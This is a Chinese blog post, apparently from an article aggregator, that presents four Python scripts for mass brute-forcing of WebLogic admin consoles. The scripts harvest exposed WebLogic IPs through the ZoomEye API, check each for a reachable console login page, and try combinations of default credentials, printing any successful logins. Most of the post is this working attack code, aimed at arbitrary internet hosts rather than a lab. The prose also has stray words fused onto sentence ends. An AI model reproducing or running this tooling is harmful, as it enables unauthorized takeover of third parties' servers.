python寫批量weblogic爆破腳本
前言:
整理筆記的時候,發現了weblogic的攻擊方法。內心打着算盤看看怎麼寫web
個批量的弱口令爆破腳本。得出瞭如下思路json
思路:
1.利用鍾馗之眼採集weblogic的網站,將IP寫入到txtapi
2.添加後臺路徑,判斷是否能成功鏈接,而且沒有過濾表裏面的錯誤。寫入到txtapp
3.轉換路徑,將後臺路徑轉換爲表單請求的路徑寫入到txtjsp
4.判斷是帳號和密碼是否成功post
詳細思路請參考:https://www.jianshu.com/p/e97b109ace40 (同時也是一份攻擊weblogic服務的好文章)測試
代碼:
weblogicpass.py網站
import requests def zoomeye(): sjian=open('save.txt','w') sjian.close() data={"username":"鍾馗之眼的登陸郵箱","password":"鍾馗之眼的登陸密碼"} url='https://api.zoomeye.org/user/login' login=requests.post(url=url,json=data) access_token=login.json()['access_token'] logheaders={'Authorization':'JWT'+' '+access_token} for x in range(10): print('[+]page is {}'.format(x)) url2s='https://api.zoomeye.org/host/search?query=app:weblogic&page={}'.format(x) rest2=requests.get(url=url2s,headers=logheaders) vd=rest2.json()['matches'][0:] for q in vd: sj='IP:',q['ip'],'Port:',q['portinfo']['port'],'App:',q['portinfo']['app'] print(sj) print(sj,file=open('save.txt','a')) zoomeye()
weblogicjiexi.pyurl
import requests import re def jx(): xj=open('save2.txt','w') xj.close() error=['404','Not Found','不存在','403'] ok=[] headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'} kew = open('save.txt', 'r') for p in kew.readlines(): we = "".join(p.split('\n')) pow = re.findall('(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)',we) for i in pow: pd = '{}'.format(i).replace('(', '').replace(')', '').replace("'", '').replace(',', '.').replace(' ', '') try: rsc=requests.get(url='http://{}/console/login/LoginForm.jsp'.format(pd),headers=headers,timeout=1.1) for e in error: if rsc.status_code==200 and rsc.text not in e: ok.append(rsc.url) except: pass id = list(set(ok)) for p in id: lk=re.findall('.*/console/login/LoginForm.jsp',p) for i in lk: print('[+]ok url:',i+'') print(i+'',file=open('save2.txt','a')) jx()
weblogiczhuanhuan.pyspa
import os import re rl=open('save3.txt','w') rl.close() if os.path.exists('save2.txt'): print('[+]ok save2.txt !') else: print('[-]Not found save2.txt') exit() yw=open('save2.txt','r') for e in yw.readlines(): w="".join(e.split('\n')) yd=re.sub('/console/login/LoginForm.jsp','/console/j_security_check',w) print(yd) print(yd,file=open('save3.txt','a'))
weblogicbaopo.py
import requests import threading def main(ip): datas={} listd=['weblogic','weblogic','weblogic','welcomel','system','password','admin','security','mary','password','joe','password','wlcsystem','wlcsystem','wlpisystem','wlpisystem','weblogic','admin','weblogic','12345678','admin','12345678'] url='{}'.format(ip) headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'} for user in listd: for passwd in listd: data='j_username={}&j_password={}&j_character_encoding=UTF-8'.format(user,passwd) for j in data.split('&'): key,value=j.split('=',1) datas[key]=value try: request=requests.post(url=url,headers=headers,data=datas,allow_redirects=False) if request.status_code==302 and 'console' in request.headers['Location'] and 'LoginForm.jsp' not in request.headers['Location']: print('[+]url:{}'.format(request.url)) print('[+]username:{}'.format(user)) print('[+]password:{}'.format(passwd)) else: print('[-]url:{}'.format(request.url)) print('[-]Error username:{}'.format(user)) print('[-]Error password:{}'.format(passwd)) except: pass if __name__ == '__main__': we=open('save3.txt','r') for w in we.readlines(): x="".join(w.split('\n')) main(x)
測試
正在爆破某個IP的截圖:
相關文章
- 1. python寫批量weblogic爆破腳本
- 2. ftp爆破(python腳本)
- 3. python 利用FOFA進行批量爆破
- 4. wordpress爆破腳本的編寫
- 5. python——ssh多線程爆破腳本
- 6. 批量管理python腳本
- 7. 爆破phpmyadmin小腳本
- 8. IISPUT 批量腳本的編寫
- 9. hadoop 批量處理腳本編寫
- 10. Metasploit批量驗證爆破telnet
- 更多相關文章...
- • Swift 下標腳本 - Swift 教程
- • 服務端腳本 指南 - 網站建設指南
- • Kotlin學習(二)基本類型
- • Kotlin學習(一)基本語法
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章